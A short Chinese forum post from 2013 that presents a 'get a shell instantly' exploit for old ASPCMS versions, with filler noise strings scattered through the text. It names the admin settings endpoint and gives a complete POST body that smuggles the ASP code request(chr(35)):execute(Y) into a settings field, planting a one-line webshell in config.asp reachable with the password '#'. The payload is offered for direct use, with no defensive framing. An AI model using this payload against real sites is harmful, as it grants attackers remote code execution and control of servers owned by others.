老的ASPCMS版本的秒杀拿SHELL漏洞$ {4 R% d8 X: a. _4 K5 V
2 ~8 r9 B7 u1 V* L' Z
找到后台。。。然后
. ~' C8 Y6 x$ W( O2 Q) V% n, ] * r+ H( v/ v3 A/ A4 ]8 L' o2 E
/admin/_system/AspCms_SiteSetting.asp?action=saves5 ^* ^. y! U, i! V: s- w- w
$ N' D! a! B# k& [2 J5 M8 g直接POST& l* z; D: p4 h9 t6 f8 F* U
9 e4 B; ?- y: K6 q% r# V8 [( b# IrunMode=1&siteMode=1&siteHelp=%B1%BE%CD%F8%D5%BE%D2%F2%B3%CC%D0%F2%C9%FD%BC%B6%B9%D8%B1%D5%D6%D0&SwitchComments=1&SwitchCommentsStatus=1&switchFaq=0:Y=request(chr(35)):execute(Y)&SwitchFaqStatus=0&dirtyStr=&waterMark=1&waterMarkFont=hahahaha&waterMarkLocation=1&smtp_usermail=aspcmstest%40163.com&smtp_user=aspcmstest&smtp_password=aspcms.cn&smtp_server=smtp.163.com&MessageAlertsEmail=13322712%40qq.com&messageReminded=1&orderReminded=1&applyReminded=1&commentReminded=1&LanguageID=1
. m+ ]* [# N5 j( ]- n' l - Z! {; \' y6 r% M! ~
再连接配置文件config.asp 密码为#
5 N. ]: h( o2 F$ |3 E |
发表于 2013-2-4 16:18:35
收藏
支持
反对